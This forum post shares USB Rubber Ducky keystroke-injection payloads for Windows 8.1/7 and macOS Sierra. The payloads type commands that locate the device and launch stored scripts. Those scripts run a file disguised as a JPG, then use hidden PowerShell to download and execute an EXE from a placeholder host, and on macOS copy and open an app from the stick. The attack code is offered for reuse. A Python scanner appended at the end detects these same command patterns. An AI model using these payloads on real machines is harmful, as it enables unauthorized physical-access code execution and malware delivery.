
USB Rubber Ducky Cross-platform payload (Win 8.1 Eng, Win 7 Esp, and macOS Sierra 10.12.1 Eng)



Hi Guys, Hola Chicos

Without long introductions, I'm a big fan of Rubber Ducky, BadUSB techniques, automation stuff, etc.

A long time ago I was working hard to get the ideal cross-platform payload which works:

1. Cross-OSes

2. Cross-keyboard layouts (not all of them currently)

As we all know, in the Rubber Ducky dual mode (Keyboard + Mass Storage) we can't *that easily* get the drive letter dynamically, and all you have to do is execute this command line:

for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d

This command line loops over the current drive letters and finds the one which has the name "DUCKY", then assigns its drive letter to the variable "duck"; after that the %duck% variable will always point to the USB Rubber Ducky drive letter.

Cool! :grin:

Simulating and writing this command line on some OS keyboard layouts is a big HEADACHE. Writing (', |, ", ^, etc.) is an Ughhhh, a big mess. I wished that the USB Rubber Ducky had a copy-paste from any source, but what can we do, it is a keyboard and we are functionally limited here!

Spanish guys know about the big headache of pressing the "AltGr" key to get some symbols like @#^, and the only way to simulate this is by modifying the kb layout, adding some ASCII codes and stuff, then rewriting the ducky script etc., so this topic is for you guys to jump over it. Cheers!

The Windows part (Win 8.1 Eng & Win 7 Esp)
So I came up with an idea (a tiny but cool one) that allowed me to execute one payload on both Windows 8.1 English UI/Kb Layout and Windows 7 Español UI/Kb Layout, and for extra fun I added some code to achieve the same on macOS Sierra (a cool way to execute something from the Ducky mass storage without the headache of the drive letter; later I will explain why). Here we go:

DEFAULT_DELAY 75
DELAY 1000
WINDOWS r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
STRING for %p in 
DELAY 10
SHIFT 8
STRING A B C D E F G H I J K L M N
DELAY 100
STRING  O P Q R S T U V W X Y Z
DELAY 10
SHIFT 9
DELAY 100
STRING do %p
DELAY 10
SHIFT .
SHIFT 7
STRING r.bat
ENTER
DELAY 100
STRING for %p in 
DELAY 100
STRING (A B C D E F G H I J K L M N
DELAY 100
STRING  O P Q R S T U V W X Y Z)
DELAY 100
STRING do %p:/r.bat
ENTER

You guys don't need me for sure to explain each step, but I will only explain the highlights:
1. I'm looping (in a hard-coded way) over all the drive letters connected to the machine to find our ONE and execute ANYTHING from a stored .bat file (possibilities are endless here to do what you want).

2. The loop mentioned above is executed twice, first on a Spanish (Latin) keyboard layout, and you can notice that I used the "SHIFT 8" key combination to simulate "(" and "SHIFT 9" to simulate ")" to achieve the command line:

for %p in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z)do %p:/symbiansymoh.bat

So, a "for" loop to execute a bat file, and this loop will be executed twice (one time for the English kb layout and the other for the Spanish kb layout).

You can put anything inside this symbiansymoh.bat file, but to satisfy your curiosity, guys, here's my content:

@echo off
color 10
REM Getting our drive letter which have the name SYMB assign to symb
for /f %%d in ('wmic volume get driveletter^,  label ^| findstr "SYMB"')do set symb=%%d
REM Copy a NOTmalicious file to the temp folder
copy %symb%\Executables\NOTmalicious.jpg %tmp%\NOTmalicious.jar /y
REM Executing the NOTmalicious file
start %tmp%\NOTmalicious.jar
REM Downloading and executing another NOTmalicious file
powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('https://www.BlahBlahBlah.com/Whatever.exe','%TEMP%\Whatever.exe'); Start-Process "%TEMP%\Whatever.exe"
REM Goodbye
exit

It doesn't matter now what language the machine you're executing the bat file on is in.

The macOS part (English KB Layout)

The macOS part is the best and kind of a no-brainer here. As you may know, Linux, Unix and Linux/Unix-like OSes use and identify USB storage by its NAME, not a LETTER (there's nothing called letters in this beautiful and lovely world).

So sending the key combinations to fire the Spotlight search and then opening the Terminal is so freaking easy, then navigating to "/Volumes/[DRIVE_NAME]/", giving the bash file "symbiansymoh.sh" the execute privileges (chmod +X), then executing it, which also does ANYTHING from a stored .sh file (possibilities are endless here to do what you want) << copy paste :grin:

DEFAULT_DELAY 75
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 100
ENTER
DELAY 500
STRING chmod +X  /Volumes/SYMB/symbiansymoh.sh
ENTER
DELAY 100
STRING nohup sh /Volumes/SYMB/symbiansymoh.sh &>/dev/null &
ENTER
DELAY 100
GUI q
DELAY 300
ENTER

And again for feeding your curiosity here's the content of my symbiansymoh.sh file:

#!/bin/bash
rm -r /tmp/NOTmalicious.app;
cp -R /Volumes/SYMB/NOTmalicious /tmp/NOTmalicious.app;
open /tmp/NOTmalicious.app;

that copies a stored NOTmalicious.app file to the temp folder then executes it.

 

Here's a PoC video that demonstrates the blah blah blah above: https://www.youtube.com/watch?v=YHzcI42dFOI

The topic is open to discussion. Any ideas or modifications are always welcome!

Cheers and have a great weekend guys!
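As an added defender-side example (not part of the original post), here is a small Python scanner that flags process command lines matching the patterns this payload has to type: the hard-coded drive-letter loop, the wmic/findstr label lookup, the hidden PowerShell download-and-run, and the macOS /Volumes script launch. The sample command lines are constructed; the example.invalid URL and C:\Temp paths are placeholders.

```python
"""Flag process command lines matching the keystroke-injection payload patterns.

Constructed example: the regexes are derived from the command lines shown in
the post above, not from any vendor signature.
"""
import re

# Each rule: (name, compiled regex).
RULES = [
    # for %p in (A B C ... Z) do %p:/x.bat  -- drive-letter brute force
    ("drive_letter_bruteforce_loop",
     re.compile(r"for\s+%\w\s+in\s+\((?:[A-Z]\s+){3,}[A-Z]\)\s*do\s+%\w:[\\/]\S+\.bat", re.I)),
    # wmic volume get driveletter, label | findstr "LABEL"  -- locate the stick
    ("volume_label_lookup",
     re.compile(r"wmic\s+volume\s+get\s+driveletter.*findstr", re.I)),
    # hidden PowerShell that downloads a file and immediately starts it
    ("hidden_powershell_download_run",
     re.compile(r"powershell.*-windowstyle\s+hidden.*DownloadFile\(.*Start-Process", re.I)),
    # macOS: chmod/nohup on a script living on a mounted volume
    ("macos_volume_script_exec",
     re.compile(r"(?:chmod\s+\+[xX]\s+/Volumes/|nohup\s+(?:ba)?sh\s+/Volumes/\S+\.sh)")),
]

def classify(cmdline):
    """Return the names of all rules matched by one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(lines):
    """Return (line_no, cmdline, matches) for every line that triggers a rule."""
    hits = []
    for no, line in enumerate(lines, start=1):
        matches = classify(line)
        if matches:
            hits.append((no, line, matches))
    return hits

# Constructed sample of process command lines (Sysmon-style), with benign noise.
SAMPLE = [
    "cmd.exe /c for %p in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do %p:/r.bat",
    "cmd.exe /c for /f %d in ('wmic volume get driveletter^, label ^| findstr \"DUCKY\"') do set duck=%d",
    "powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile("
    "'https://example.invalid/x.exe','C:\\Temp\\x.exe'); Start-Process \"C:\\Temp\\x.exe\"",
    "nohup sh /Volumes/SYMB/symbiansymoh.sh &>/dev/null &",
    "for %i in (*.txt) do type %i",               # benign loop, must not match
    "powershell -File C:\\scripts\\backup.ps1",   # benign, must not match
]

if __name__ == "__main__":
    for no, line, matches in scan(SAMPLE):
        print(f"line {no}: {', '.join(matches)} :: {line[:60]}")
```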
